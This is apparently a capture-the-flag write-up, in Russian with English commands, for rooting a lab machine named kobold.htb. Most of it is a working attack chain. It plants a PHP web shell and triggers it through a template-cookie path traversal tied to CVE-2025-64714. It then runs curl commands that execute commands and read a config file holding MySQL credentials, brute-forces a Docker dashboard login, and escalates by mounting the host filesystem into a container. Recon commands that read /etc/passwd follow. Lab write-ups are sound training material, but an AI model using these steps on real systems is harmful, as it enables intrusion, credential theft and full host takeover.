###VHOST K*** part 2### ##Steps to root## #Из вывода nmap и gobuster нашел страницу https://bin.kobold.htb/ #Загуглил и выяснил, что есть CVE-2025-64714. 1. echo ‘<?php system($_GET[“cmd”]); ?>’ > /privatebin-data/data/shell.php 2. curl -sk “https://bin.kobold.htb/?cmd=id” -H “Cookie: template=…/data/shell” #Вывод конфига, в котором учетные данные для mysql. 3. curl -sk “https://bin.kobold.htb/?cmd=cat+/srv/cfg/conf.php” -H “Cookie: template=…/data/shell” #Каждый найденный пароль при пентесте нужно пробовать во всех обнаруженных сервисах. #С помощью Burp Intruder tool сбрутил форму входа http://kobold.htb:3552/, полученную ранее (логин оказался дефолтным, а пароль подошел из conf.php). #Мы внутри. Полноценный Docker management dashboard: контейнеры, образы, volumes, networks — всё под контролем. #Как правило, на одном хостинге несколько PHP-приложений, значит, есть возможность получить доступ к root. #Создал Docker-контейнер через веб-интерфейс, который монтирует корневую файловую систему хоста — получим root. #Через Shell нашел нужный файл. 4. find / -name “root.txt” ###Некоторые команды для внутренней разведки### id cat /etc/group cat /etc/passwd | grep -v nologin | grep -v false netstat -tulpn